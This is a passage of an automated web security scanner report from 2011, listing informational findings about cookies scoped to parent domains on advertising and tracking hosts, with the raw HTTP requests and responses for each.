Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU6lf.fVeAIymmN1SQMQiY3K8TkjADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQZQKgq8xSjICExPOxn5gRSDAR8DIzMjCxMrPxsjOyMHIycjFyM3Iw8jLyMfWAFLJqMIUN3SArAuBTOIYAiTCKMoUFh.FzcrE3aNi90ZgY6CJVqQCxgAgheTPA--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUdGc9RhW_mTSRLtae_2aqZWuBa4kDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQYGLgaG5eaMQMUMgbcYBYEU505GfiDFYMDHwMjMxMLPysjGyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XDwohL62J3sIXA1JsWdgrkEgYGANcJlFc-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:44 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=101339&t=2
Content-Length: 0
Date: Mon, 09 May 2011 15:35:43 GMT


10.14. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035073&rn=1981680086&c7=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c8=Business%20news%20articles%20and%20blogs%20-%20The%20Christian%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 15:34:58 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 15:34:58 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.15. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=2114357914 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 15:35:19 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 15:35:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.16. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732017&c4=194941149&c5=1&c6=41&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c9=&c10=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c15=&1304955322131 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; BMX_G=method->-1,ts->1304954985; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 15:35:23 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 08-May-2013 15:35:23 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.17. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http://matcher.bidder7.mookie1.com/do-association?return=ctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; vf=1; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 15:38:27 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 15:38:27 GMT; Path=/
Location: http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 09 May 2011 15:38:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


10.18. http://bidder.mathtag.com/iframe/notify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=
...[SNIP]...

10.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001juYhaL6r07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001iRpfaL7W0c9M00001juYhaL6q07Kl00001jAsGaJH602WG00003jBofaIOs07Si00001; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut910n0000000001uy98nW0000000001uy; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 2338

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.20. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=166
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close
Content-Length: 1996

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

10.21. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.fox8live.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.fox8live.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx&xp66c HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1304951889.1FE|1304951889.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 15:38:05 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 15:38:05 GMT; Path=/
Set-Cookie: di=%7B%7D..1304951889.1FE|1304955485.1OD|1304951889.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 15:38:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 15:38:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:05 GMT
Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

10.22. http://ib.adnxs.com/ab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=AQAAAAAADEAAAAAAAAAMQAAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAehMn5gAAAAA.&tt_code=vert-107&udj=uf%28%27a%27%2C+9797%2C+1304955326%29%3Buf%28%27c%27%2C+45814%2C+1304955326%29%3Buf%28%27r%27%2C+173255%2C+1304955326%29%3Bppv%288991%2C+%277215316608111068896%27%2C+1304955326%2C+1304998526%2C+45814%2C+25553%29%3B&cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU.&referrer=http://www.csmonitor.com/Business&pp=TcgJqwAJrDQK5ToFmVxG_jr_KjIn-i4M6rRykw&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:11 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:11 GMT; domain=.adnxs.com; HttpOnly
